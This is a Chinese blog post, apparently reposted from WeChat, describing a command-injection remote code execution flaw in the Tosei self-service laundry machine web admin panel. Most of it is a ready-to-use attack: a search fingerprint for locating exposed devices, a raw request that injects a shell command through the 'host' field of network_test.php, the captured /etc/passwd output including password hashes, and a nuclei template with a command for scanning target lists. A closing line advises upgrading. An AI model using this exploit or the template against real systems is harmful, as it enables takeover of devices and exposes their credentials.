免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
福利:小编整理了大量电子书和护网常用工具,在文末免费获取。
tosei 自助洗衣机web管理端
日本Tosei 自助洗衣机 web 管理端存在安全漏洞,攻击者利用该漏洞可以通过 network_test.php 的命令执行,在服务器任意执行代码,获取服务器权限,进而控制整个服务器。
body="tosei_login_check.php"
向靶场发送如下数据包
POST /cgi-bin/network_test.php HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36Connection: closeContent-Length: 44Accept: */*Accept-Encoding: gzipAccept-Language: enContent-Type: application/x-www-form-urlencodedhost=%0acat${IFS}/etc/passwd%0a&command=ping
响应内容如下
HTTP/1.1 200 OKConnection: closeTransfer-Encoding: chunkedContent-Type: text/htmlDate: Tue, 19 Dec 2023 08:29:06 GMTServer: Apache/1.3.31 (Unix)X-Powered-By: PHP/4.4.2<HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/css"><LINK HREF="/css/style4.css" REL="stylesheet" TYPE="text/css" charset="SJIS" /><LINK REL="SHORTCUT ICON" HREF="/favicon.ico"><SCRIPT LANGUAGE="JavaScript"><!--function checkChar( str ){for( ii = 0 ; ii < str.length ; ii++ ){code = str.charCodeAt(ii);if( (code < 0x2d) || (0x7a < code)|| code == 0x2f|| ( 0x3a <= code && code <= 0x40 )|| ( 0x5b <= code && code <= 0x5e )|| code == 0x60){return false;}}return true;}function checkHost( box, org ){if( checkChar(box.value) == false ){alert("���͂��ꂽ�z�X�g���ɕs�K�ȕ������܂܂��Ă��܂�n"+ "���͉�ȕ����F�@���p�p���� �Ɓu.�v�u-�v�u_�vn");box.value = org;}}--></SCRIPT><TITLE>�l�b�g���[�N���ʃ`�F�b�N</TITLE></HEAD><BODY><A HREF="../system_frame.html" TARGET="_top">�߂�</A><H1>�l�b�g���[�N���ʃ`�F�b�N</H1><TABLE WIDTH="80%"><TR><TH>ping�R�}���h�̌���</TH></TR><TR><TD><PRE>root:$1$$oCLuEVgI1iAqOA8pwkzAg1:0:0:root:/home/root:/bin/bashbin:*:1:1:bin:/bin:daemon:*:2:2:daemon:/sbin:adm:*:3:4:adm:/var/adm:lp:*:4:7:lp:/var/spool/lpd:sync:*:5:0:sync:/sbin:/bin/syncshutdown:*:6:0:shutdown:/sbin:/sbin/shutdownhalt:*:7:0:halt:/sbin:/sbin/haltmail:*:8:12:mail:/var/spool/mail:news:*:9:13:news:/var/spool/news:uucp:*:10:14:uucp:/var/spool/uucp:operator:*:11:0:operator:/root:games:*:12:100:games:/usr/games:gopher:*:13:30:gopher:/usr/lib/gopher-data:ftp:*:14:50:FTP User:/home/ftp:nobody:*:99:99:Nobody:/:nscd:*:28:28:NSCD Daemon:/:/bin/falsemailnull:*:47:47::/var/spool/mqueue:/dev/nullident:*:98:98:pident user:/:/bin/falserpc:*:32:32:Portmapper RPC user:/:/bin/falserpcuser:*:29:29:RPC Service User:/var/lib/nfs:/bin/falsexfs:*:43:43:X Font Server:/etc/X11/fs:/bin/falsegdm:*:42:42::/home/gdm:/bin/bashsshd:*:100:100:OpenSSH Privilege Separation:/var/run/sshd:contec:$1$$Rq3kyMBU/8HuEGYDeWsm81:501:501:Linux User,,,:/home/contec:/bin/bashfws:$1$$YWF0cxGsQLEPNeBm/hxa0.:502:502:Linux User,,,:/home/fws:/bin/sh<br/></PRE></TD></TR></TABLE><FORM ACTION="network_test.php" METHOD="post"><TABLE WIDTH="80%"><TR><TH WIDTH="30%">�����Ώۃz�X�g��</TH><TD WIDTH="70%"><INPUT TYPE="text" NAME="host" VALUE="cat${IFS}/etc/passwd" LENGTH="30" MAXLENGTH="40" onBlur="checkHost( this, '')" style="width:150px">�@���z�X�g����IP�A�h���X�Ŏw��</TD></TR><TR><TH>�����R�}���h</TH><TD><TABLE CLASS="inner"><TR><TD CLASS="inner">�l�b�g���[�N�̓��ʂ��m�F</TD><TD CLASS="inner">���@<INPUT TYPE="submit" NAME="command" VALUE="ping"></TD></TR><TR><TD CLASS="inner">DNS�̖��O�������m�F</TD><TD CLASS="inner">���@<INPUT TYPE="submit" NAME="command" VALUE="nslookup"></TD></TR></TABLE></TD></TR></TABLE></FORM></BODY></HTML>
漏洞复现成功
poc文件内容如下
id: tosei-network_test-rceinfo:name: Tosei 自助洗衣机 network_test.php RCE漏洞author: fgzseverity: criticaldescription: 'Tosei 自助洗衣机 web 管理端存在安全漏洞,攻击者利用该漏洞可以通过 network_test.php 的命令执行,在服务器任意执行代码,获取服务器权限,进而控制整个服务器。'tags: 2023,tosei,rcemetadata:: 3: body="tosei_login_check.php"verified: truehttp:method: POSTpath:"{{BaseURL}}/cgi-bin/network_test.php"headers:: application/x-www-form-urlencoded: gzipbody: "host=%0acat${IFS}/etc/passwd%0a&command=ping"matchers:type: dsldsl:"status_code == 200 && contains(body, 'root:')"
运行POC
nuclei.exe -t tosei-network_test-rce.yaml -l tosei.txt
升级到最新版本。
原文始发于微信公众号(AI与网安):日本tosei自助洗衣机RCE漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论